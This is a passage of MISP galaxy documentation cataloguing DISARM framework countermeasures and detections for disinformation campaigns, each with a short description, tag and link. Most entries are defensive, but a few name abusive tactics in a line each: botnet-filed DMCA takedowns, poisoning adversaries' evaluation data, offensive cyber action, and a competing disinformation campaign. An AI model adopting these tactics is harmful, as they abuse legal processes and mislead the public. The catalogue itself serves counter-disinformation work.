Includes “this has been disproved: do you want to forward it”. Includes “"Hey this story is old" popup when messaging with old URL” - this assumes that this technique is based on visits to a URL shortener or a captured news site that can publish a message of our choice. Includes “mark clickbait visually”.

The tag is: misp-galaxy:disarm-countermeasures="Platform adds warning label and decision point when sharing content"

Table 1118. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00142.md

(botnet) DMCA takedown requests to waste group time

Use copyright infringement claims to remove videos etc.

The tag is: misp-galaxy:disarm-countermeasures="(botnet) DMCA takedown requests to waste group time"

Table 1119. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00143.md

Buy out troll farm employees / offer them jobs

Degrade the infrastructure. Could e.g. pay to not act for 30 days. Not recommended

The tag is: misp-galaxy:disarm-countermeasures="Buy out troll farm employees / offer them jobs"

Table 1120. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00144.md

Make amplification of social media posts expire (e.g. can’t like/ retweet after n days)

Stop new community activity (likes, comments) on old social media posts.

The tag is: misp-galaxy:disarm-countermeasures="Make amplification of social media posts expire (e.g. can’t like/ retweet after n days)"

Table 1121. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00147.md

Add random links to network graphs

If creators are using network analysis to determine how to attack networks, then adding random extra links to those networks might throw that analysis out enough to change attack outcomes. Unsure which DISARM techniques.

The tag is: misp-galaxy:disarm-countermeasures="Add random links to network graphs"

Table 1122. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00148.md

Poison the monitoring & evaluation data

Includes Pollute the AB-testing data feeds: Polluting A/B testing requires knowledge of MOEs and MOPs. A/B testing must be caught early when there is relatively little data available so infiltration of TAs and understanding of how content is migrated from testing to larger audiences is fundamental.

The tag is: misp-galaxy:disarm-countermeasures="Poison the monitoring & evaluation data"

Table 1123. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00149.md

Take pre-emptive action against actors' infrastructure

Align offensive cyber action with information operations and counter disinformation approaches, where appropriate.

The tag is: misp-galaxy:disarm-countermeasures="Take pre-emptive action against actors' infrastructure"

Table 1124. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00153.md

Ask media not to report false information

Train media to spot and respond to misinformation, and ask them not to post or transmit misinformation they’ve found.

The tag is: misp-galaxy:disarm-countermeasures="Ask media not to report false information"

Table 1125. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00154.md

Ban incident actors from funding sites

Ban misinformation creators and posters from funding sites

The tag is: misp-galaxy:disarm-countermeasures="Ban incident actors from funding sites"

Table 1126. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00155.md

Better tell your country or organisation story

Civil engagement activities conducted on the part of EFP forces. NATO should likewise provide support and training, where needed, to local public affairs and other communication personnel. Local government and military public affairs personnel can play their part in creating and disseminating entertaining and sharable content that supports the EFP mission.

The tag is: misp-galaxy:disarm-countermeasures="Better tell your country or organisation story"

Table 1127. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00156.md

Have a disinformation response plan

e.g. Create a campaign plan and toolkit for competition short of armed conflict (this used to be called “the grey zone”). The campaign plan should account for own vulnerabilities and strengths, and not over-rely on any one tool of statecraft or line of effort. It will identify and employ a broad spectrum of national power to deter, compete, and counter (where necessary) other countries’ approaches, and will include understanding of own capabilities, capabilities of disinformation creators, and international standards of conduct to compete in, shrink the size, and ultimately deter use of competition short of armed conflict.

The tag is: misp-galaxy:disarm-countermeasures="Have a disinformation response plan"

Table 1128. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00159.md

find and train influencers

Identify key influencers (e.g. use network analysis), then reach out to identified users and offer support, through either training or resources.

The tag is: misp-galaxy:disarm-countermeasures="find and train influencers"

Table 1129. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00160.md

Coalition Building with stakeholders and Third-Party Inducements

Advance coalitions across borders and sectors, spanning public and private, as well as foreign and domestic, divides. Improve mechanisms to collaborate, share information, and develop coordinated approaches with the private sector at home and allies and partners abroad.

The tag is: misp-galaxy:disarm-countermeasures="Coalition Building with stakeholders and Third-Party Inducements"

Table 1130. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00161.md

Unravel/target the Potemkin villages

Kremlin’s narrative spin extends through constellations of “civil society” organisations, political parties, churches, and other actors. Moscow leverages think tanks, human rights groups, election observers, Eurasianist integration groups, and orthodox groups. A collection of Russian civil society organisations, such as the Federal Agency for the Commonwealth of Independent States Affairs, Compatriots Living Abroad, and International Humanitarian Cooperation, together receive at least US$100 million per year, in addition to government-organized nongovernmental organisations (NGOs), at least 150 of which are funded by Russian presidential grants totaling US$70 million per year.

The tag is: misp-galaxy:disarm-countermeasures="Unravel/target the Potemkin villages"

Table 1131. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00162.md

compatriot policy

Protect the interests of this population and, more importantly, influence the population to support pro-Russia causes and effectively influence the politics of its neighbours.

The tag is: misp-galaxy:disarm-countermeasures="compatriot policy"

Table 1132. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00164.md

Ensure integrity of official documents

e.g. for leaked legal documents, use court motions to limit future discovery actions

The tag is: misp-galaxy:disarm-countermeasures="Ensure integrity of official documents"

Table 1133. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00165.md

develop a creative content hub

International donors will donate to a basket fund that will pay a committee of local experts who will, in turn, manage and distribute the money to Russian-language producers and broadcasters that pitch various projects.

The tag is: misp-galaxy:disarm-countermeasures="develop a creative content hub"

Table 1134. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00169.md

elevate information as a critical domain of statecraft

Shift from reactive to proactive response, with priority on sharing relevant information with the public and mobilising private-sector engagement. Recent advances in data-driven technologies have elevated information as a source of power to influence the political and economic environment, to foster economic growth, to enable a decision-making advantage over competitors, and to communicate securely and quickly.

The tag is: misp-galaxy:disarm-countermeasures="elevate information as a critical domain of statecraft"

Table 1135. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00170.md

social media source removal

Removing accounts, pages, groups, e.g. Facebook page removal.

The tag is: misp-galaxy:disarm-countermeasures="social media source removal"

Table 1136. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00172.md

Create a healthier news environment

Free and fair press: create bipartisan, patriotic commitment to press freedom. Note the difference between news and editorialising. Build alternative news sources: create alternative local-language news sources to counter local-language propaganda outlets. Delegitimize the 24-hour news cycle. Includes Provide an alternative to disinformation content by expanding and improving local content: Develop content that can displace geopolitically-motivated narratives in the entire media environment, both new and old media alike.

The tag is: misp-galaxy:disarm-countermeasures="Create a healthier news environment"

Table 1137. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00174.md

Improve Coordination amongst stakeholders: public and private

Coordinated disinformation challenges are increasingly multidisciplinary; there are few organisations within the national security structures that are equipped with the broad-spectrum capability to effectively counter large-scale conflict short of war tactics in real-time. Institutional hurdles currently impede diverse subject matter experts, hailing from outside of the traditional national security and foreign policy disciplines (e.g., physical science, engineering, media, legal, and economics fields), from contributing to the direct development of national security countermeasures to emerging conflict short of war threat vectors. A Cognitive Security Action Group (CSAG), akin to the Counterterrorism Security Group (CSG), could drive interagency alignment across equivalents of DHS, DoS, DoD, Intelligence Community, and other implementing agencies, in areas including strategic narrative, and the nexus of cyber and information operations.

The tag is: misp-galaxy:disarm-countermeasures="Improve Coordination amongst stakeholders: public and private"

Table 1138. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00176.md

Fill information voids with non-disinformation content

1) Pollute the data voids with wholesome content (Kittens! Babyshark!). 2) fill data voids with relevant information, e.g. increase Russian-language programming in areas subject to Russian disinformation.

The tag is: misp-galaxy:disarm-countermeasures="Fill information voids with non-disinformation content"

Table 1139. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00178.md

Redirection / malware detection/ remediation

Detect redirection or malware, then quarantine or delete.

The tag is: misp-galaxy:disarm-countermeasures="Redirection / malware detection/ remediation"

Table 1140. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00182.md

Media exposure

Highlight misinformation activities and actors in the media.

The tag is: misp-galaxy:disarm-countermeasures="Media exposure"

Table 1141. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00184.md

Newsroom/Journalist training to counter influence moves

Includes SEO influence. Includes promotion of a “higher standard of journalism”: journalism training “would be helpful, especially for the online community”. Includes Strengthen local media: Improve effectiveness of local media outlets.

The tag is: misp-galaxy:disarm-countermeasures="Newsroom/Journalist training to counter influence moves"

Table 1142. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00188.md

Ensure that platforms are taking down flagged accounts

Use ongoing analysis/monitoring of "flagged" profiles. Confirm whether platforms are actively removing flagged accounts, and raise pressure via e.g. government organisations to encourage removal

The tag is: misp-galaxy:disarm-countermeasures="Ensure that platforms are taking down flagged accounts"

Table 1143. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00189.md

open engagement with civil society

Government open engagement with civil society as an independent check on government action and messaging. Government seeks to coordinate and synchronise narrative themes with allies and partners while calibrating action in cases where elements in these countries may have been co-opted by competitor nations. Includes “fight in the light”: Use leadership in the arts, entertainment, and media to highlight and build on fundamental tenets of democracy.

The tag is: misp-galaxy:disarm-countermeasures="open engagement with civil society"

Table 1144. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00190.md

Redirect searches away from disinformation or extremist content

Use Google AdWords to identify instances in which people search Google about particular fake-news stories or propaganda themes. Includes Monetize centrist SEO by subsidising the difference in greater clicks towards extremist content.

The tag is: misp-galaxy:disarm-countermeasures="Redirect searches away from disinformation or extremist content"

Table 1145. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00195.md

remove suspicious accounts

Standard reporting for false profiles (identity issues). Includes detecting hijacked accounts and reallocating them - if possible, back to original owners.

The tag is: misp-galaxy:disarm-countermeasures="remove suspicious accounts"

Table 1146. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00197.md

Respected figure (influencer) disavows misinfo

FIXIT: standardise language used for influencer/ respected figure.

The tag is: misp-galaxy:disarm-countermeasures="Respected figure (influencer) disavows misinfo"

Table 1147. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00200.md

Set data 'honeytraps'

Set honeytraps in content likely to be accessed for disinformation.

The tag is: misp-galaxy:disarm-countermeasures="Set data 'honeytraps'"

Table 1148. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00202.md

Stop offering press credentials to propaganda outlets

Remove access to official press events from known misinformation actors.

The tag is: misp-galaxy:disarm-countermeasures="Stop offering press credentials to propaganda outlets"

Table 1149. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00203.md

strong dialogue between the federal government and private sector to encourage better reporting

Increase civic resilience by partnering with business community to combat grey zone threats and ensuring adequate reporting and enforcement mechanisms.

The tag is: misp-galaxy:disarm-countermeasures="strong dialogue between the federal government and private sector to encourage better reporting"

Table 1150. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00205.md

Run a competing disinformation campaign - not recommended

The tag is: misp-galaxy:disarm-countermeasures="Run a competing disinformation campaign - not recommended"

Table 1151. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00207.md

Use humorous counter-narratives

The tag is: misp-galaxy:disarm-countermeasures="Use humorous counter-narratives"

Table 1152. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00211.md

build public resilience by making civil society more vibrant

Increase public service experience, and support wider civics and history education.

The tag is: misp-galaxy:disarm-countermeasures="build public resilience by making civil society more vibrant"

Table 1153. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00212.md

Use advertiser controls to stem flow of funds to bad actors

Prevent ad revenue going to disinformation domains

The tag is: misp-galaxy:disarm-countermeasures="Use advertiser controls to stem flow of funds to bad actors"

Table 1154. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00216.md

Add metadata to content that’s out of the control of disinformation creators

Steganography. Adding date, signatures etc to stop issue of photo relabelling etc.

The tag is: misp-galaxy:disarm-countermeasures="Add metadata to content that’s out of the control of disinformation creators"

Table 1155. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00219.md

Develop a monitoring and intelligence plan

Create a plan for misinformation and disinformation response, before it’s needed. Include connections / contacts needed, expected countermessages etc.

The tag is: misp-galaxy:disarm-countermeasures="Develop a monitoring and intelligence plan"

Table 1156. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00220.md

Run a disinformation red team, and design mitigation factors

Include PACE plans - Primary, Alternate, Contingency, Emergency

The tag is: misp-galaxy:disarm-countermeasures="Run a disinformation red team, and design mitigation factors"

Table 1157. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00221.md

Tabletop simulations

Simulate misinformation and disinformation campaigns, and responses to them, before campaigns happen.

The tag is: misp-galaxy:disarm-countermeasures="Tabletop simulations"

Table 1158. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00222.md

Strengthen Trust in social media platforms

Improve trust in the misinformation responses from social media and other platforms. Examples include creating greater transparency on their actions and algorithms.

The tag is: misp-galaxy:disarm-countermeasures="Strengthen Trust in social media platforms"

Table 1159. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00223.md

Detections

DISARM is a framework designed for describing and understanding disinformation incidents.

Detections is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

DISARM Project

Analyse aborted / failed campaigns

Examine failed campaigns. How did they fail? Can we create useful activities that increase these failures?

The tag is: misp-galaxy:disarm-detections="Analyse aborted / failed campaigns"

Table 1160. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00001.md

Analyse viral fizzle

We have no idea what this means. Is it something to do with the way a viral story spreads?

The tag is: misp-galaxy:disarm-detections="Analyse viral fizzle"

Table 1161. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00002.md

Exploit counter-intelligence vs bad actors

The tag is: misp-galaxy:disarm-detections="Exploit counter-intelligence vs bad actors"

Table 1162. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00003.md

Recruit like-minded converts "people who used to be in-group"

The tag is: misp-galaxy:disarm-detections="Recruit like-minded converts "people who used to be in-group""

Table 1163. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00004.md

SWOT Analysis of Cognition in Various Groups

Strengths, Weaknesses, Opportunities, Threats analysis of groups and audience segments.

The tag is: misp-galaxy:disarm-detections="SWOT Analysis of Cognition in Various Groups"

Table 1164. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00005.md

SWOT analysis of tech platforms

The tag is: misp-galaxy:disarm-detections="SWOT analysis of tech platforms"

Table 1165. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00006.md

Monitor account level activity in social networks

The tag is: misp-galaxy:disarm-detections="Monitor account level activity in social networks"

Table 1166. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00007.md

Detect abnormal amplification

The tag is: misp-galaxy:disarm-detections="Detect abnormal amplification"

Table 1167. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00008.md

Detect abnormal events

The tag is: misp-galaxy:disarm-detections="Detect abnormal events"

Table 1168. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00009.md

Detect abnormal groups

The tag is: misp-galaxy:disarm-detections="Detect abnormal groups"

Table 1169. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00010.md

Detect abnormal pages

The tag is: misp-galaxy:disarm-detections="Detect abnormal pages"

Table 1170. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00011.md

Detect abnormal profiles, e.g. prolific pages/ groups/ people

The tag is: misp-galaxy:disarm-detections="Detect abnormal profiles, e.g. prolific pages/ groups/ people"

Table 1171. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00012.md

Identify fake news sites

The tag is: misp-galaxy:disarm-detections="Identify fake news sites"

Table 1172. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00013.md

Trace connections

E.g. for fake news sites.

The tag is: misp-galaxy:disarm-detections="Trace connections"

Table 1173. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00014.md

Detect anomalies in membership growth patterns

I include Fake Experts as they may use funding campaigns such as Patreon to fund their operations and so these should be watched.

The tag is: misp-galaxy:disarm-detections="Detect anomalies in membership growth patterns"

Table 1174. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00015.md

Identify fence-sitters

Note: In each case, depending on the platform there may be a way to identify a fence-sitter. For example, online polls may have a neutral option or a "somewhat this-or-that" option, and may reveal who voted for that to all visitors. This information could be of use to data analysts. In TA08-11, the engagement level of victims could be identified to detect and respond to increasing engagement.

The tag is: misp-galaxy:disarm-detections="Identify fence-sitters"

Table 1175. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00016.md

Measure emotional valence

The tag is: misp-galaxy:disarm-detections="Measure emotional valence"

Table 1176. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00017.md

Follow the money

track funding sources

The tag is: misp-galaxy:disarm-detections="Follow the money"

Table 1177. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00018.md

Activity resurgence detection (alarm when dormant accounts become activated)

The tag is: misp-galaxy:disarm-detections="Activity resurgence detection (alarm when dormant accounts become activated)"

Table 1178. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00019.md

Detect anomalous activity

The tag is: misp-galaxy:disarm-detections="Detect anomalous activity"

Table 1179. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00020.md

AI/ML automated early detection of campaign planning

The tag is: misp-galaxy:disarm-detections="AI/ML automated early detection of campaign planning"

Table 1180. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00021.md

Digital authority - regulating body (united states)

The tag is: misp-galaxy:disarm-detections="Digital authority - regulating body (united states)"

Table 1181. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00022.md

Periodic verification (counter to hijack legitimate account)

The tag is: misp-galaxy:disarm-detections="Periodic verification (counter to hijack legitimate account)"

Table 1182. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00023.md

Teach civics to kids/ adults/ seniors

The tag is: misp-galaxy:disarm-detections="Teach civics to kids/ adults/ seniors"

Table 1183. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00024.md

Boots-on-the-ground early narrative detection

The tag is: misp-galaxy:disarm-detections="Boots-on-the-ground early narrative detection"

Table 1184. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00025.md

Language anomoly detection

The tag is: misp-galaxy:disarm-detections="Language anomoly detection"

Table 1185. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00026.md

Unlikely correlation of sentiment on same topics

The tag is: misp-galaxy:disarm-detections="Unlikely correlation of sentiment on same topics"

Table 1186. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00027.md

Associate a public key signature with government documents

The tag is: misp-galaxy:disarm-detections="Associate a public key signature with government documents"

Table 1187. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00028.md

Detect proto narratives, i.e. RT, Sputnik

The tag is: misp-galaxy:disarm-detections="Detect proto narratives, i.e. RT, Sputnik"

Table 1188. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00029.md

Early detection and warning - reporting of suspect content

The tag is: misp-galaxy:disarm-detections="Early detection and warning - reporting of suspect content"

Table 1189. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00030.md

Educate on how to identify information pollution

Strategic planning included as inoculating the population has strategic value.

The tag is: misp-galaxy:disarm-detections="Educate on how to identify information pollution"

Table 1190. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00031.md

Educate on how to identify to pollution

DUPLICATE - DELETE

The tag is: misp-galaxy:disarm-detections="Educate on how to identify to pollution"

Table 1191. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00032.md

Fake websites: add transparency on business model

The tag is: misp-galaxy:disarm-detections="Fake websites: add transparency on business model"

Table 1192. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00033.md

Flag the information spaces so people know about active flooding effort

The tag is: misp-galaxy:disarm-detections="Flag the information spaces so people know about active flooding effort"

Table 1193. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00034.md

Identify repeated narrative DNA

The tag is: misp-galaxy:disarm-detections="Identify repeated narrative DNA"

Table 1194. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00035.md

Looking for AB testing in unregulated channels

The tag is: misp-galaxy:disarm-detections="Looking for AB testing in unregulated channels"

Table 1195. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00036.md

News content provenance certification.

Original Comment: Shortcomings: intentional falsehood. Doesn’t solve accuracy. Can’t be mandatory. Technique should be in terms of "strategic inoculation", raising the standards of what people expect in terms of evidence when consuming news.

The tag is: misp-galaxy:disarm-detections="News content provenance certification."

Table 1196. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00037.md

Social capital as attack vector

Unsure I understood the original intention or what it applied to. Therefore the techniques listed (10, 39, 43, 57, 61) are under my interpretation - which is that we want to track ignorant agents who fall into the enemy’s trap and show a cost to financing/reposting/helping the adversary via public shaming or other means.

The tag is: misp-galaxy:disarm-detections="Social capital as attack vector"

Table 1197. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00038.md

standards to track image/ video deep fakes - industry

The tag is: misp-galaxy:disarm-detections="standards to track image/ video deep fakes - industry"

Table 1198. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00039.md

Unalterable metadata signature on origins of image and provenance

The tag is: misp-galaxy:disarm-detections="Unalterable metadata signature on origins of image and provenance"

Table 1199. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00040.md

Bias detection

Not technically left of boom

The tag is: misp-galaxy:disarm-detections="Bias detection"

Table 1200. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00041.md

Categorise polls by intent

Use T00029, but against the creators

The tag is: misp-galaxy:disarm-detections="Categorise polls by intent"

Table 1201. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00042.md

Monitor for creation of fake known personas

Platform companies and some information security companies (e.g. ZeroFox) do this.

The tag is: misp-galaxy:disarm-detections="Monitor for creation of fake known personas"

Table 1202. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00043.md

Forensic analysis

Can be used in all phases for all techniques.

The tag is: misp-galaxy:disarm-detections="Forensic analysis"

Table 1203. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00044.md

Forensic linguistic analysis

Can be used in all phases for all techniques.

The tag is: misp-galaxy:disarm-detections="Forensic linguistic analysis"

Table 1204. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00045.md

Pump priming analytics

The tag is: misp-galaxy:disarm-detections="Pump priming analytics"

Table 1205. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00046.md

trace involved parties

The tag is: misp-galaxy:disarm-detections="trace involved parties"

Table 1206. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00047.md

Trace known operations and connection

The tag is: misp-galaxy:disarm-detections="Trace known operations and connection"

Table 1207. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00048.md

trace money

The tag is: misp-galaxy:disarm-detections="trace money"

Table 1208. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00049.md

Web cache analytics

The tag is: misp-galaxy:disarm-detections="Web cache analytics"

Table 1209. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00050.md

Challenge expertise

The tag is: misp-galaxy:disarm-detections="Challenge expertise"

Table 1210. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00051.md

Discover sponsors

Discovering the sponsors behind a campaign, narrative, bot, set of accounts, social media comment, or anything else is useful.

The tag is: misp-galaxy:disarm-detections="Discover sponsors"

Table 1211. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00052.md

Government rumour control office (what can we learn?)

The tag is: misp-galaxy:disarm-detections="Government rumour control office (what can we learn?)"

Table 1212. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00053.md

Restrict people who can @ you on social networks

The tag is: misp-galaxy:disarm-detections="Restrict people who can @ you on social networks"

Table 1213. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00054.md

Verify credentials

The tag is: misp-galaxy:disarm-detections="Verify credentials"

Table 1214. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00055.md

Verify organisation legitimacy

The tag is: misp-galaxy:disarm-detections="Verify organisation legitimacy"

Table 1215. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00056.md

Verify personal credentials of experts

The tag is: misp-galaxy:disarm-detections="Verify personal credentials of experts"

Table 1216. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00057.md

Deplatform (cancel culture)

*Deplatform People: This technique needs to be a bit more specific to distinguish it from "account removal" or DDOS and other techniques that get more specific when applied to content. For example, other ways of deplatforming people include attacking their sources of funds, their allies, their followers, etc.

The tag is: misp-galaxy:disarm-detections="Deplatform (cancel culture)"

Table 1217. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00058.md

Identify susceptible demographics

All techniques provide or are susceptible to being countered by, or leveraged for, knowledge about user demographics.

The tag is: misp-galaxy:disarm-detections="Identify susceptible demographics"

Table 1218. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00059.md

Identify susceptible influencers

I assume this was a transcript error. Otherwise, "Identify Susceptible Influences" as in the various methods of influences that may work against a victim could also be a technique. Nope, wasn’t a transcript error: original note says influencers, as in find people of influence that might be targeted.

The tag is: misp-galaxy:disarm-detections="Identify susceptible influencers"

Table 1219. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00060.md

Microtargeting

The tag is: misp-galaxy:disarm-detections="Microtargeting"

Table 1220. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00061.md

Detect when Dormant account turns active

The tag is: misp-galaxy:disarm-detections="Detect when Dormant account turns active"

Table 1221. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00062.md

Linguistic change analysis

The tag is: misp-galaxy:disarm-detections="Linguistic change analysis"

Table 1222. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00063.md

Monitor reports of account takeover

The tag is: misp-galaxy:disarm-detections="Monitor reports of account takeover"

Table 1223. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00064.md

Sentiment change analysis

The tag is: misp-galaxy:disarm-detections="Sentiment change analysis"

Table 1224. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00065.md

Use language errors, time to respond to account bans and lawsuits, to indicate capabilities

The tag is: misp-galaxy:disarm-detections="Use language errors, time to respond to account bans and lawsuits, to indicate capabilities"

Table 1225. Table References

Links

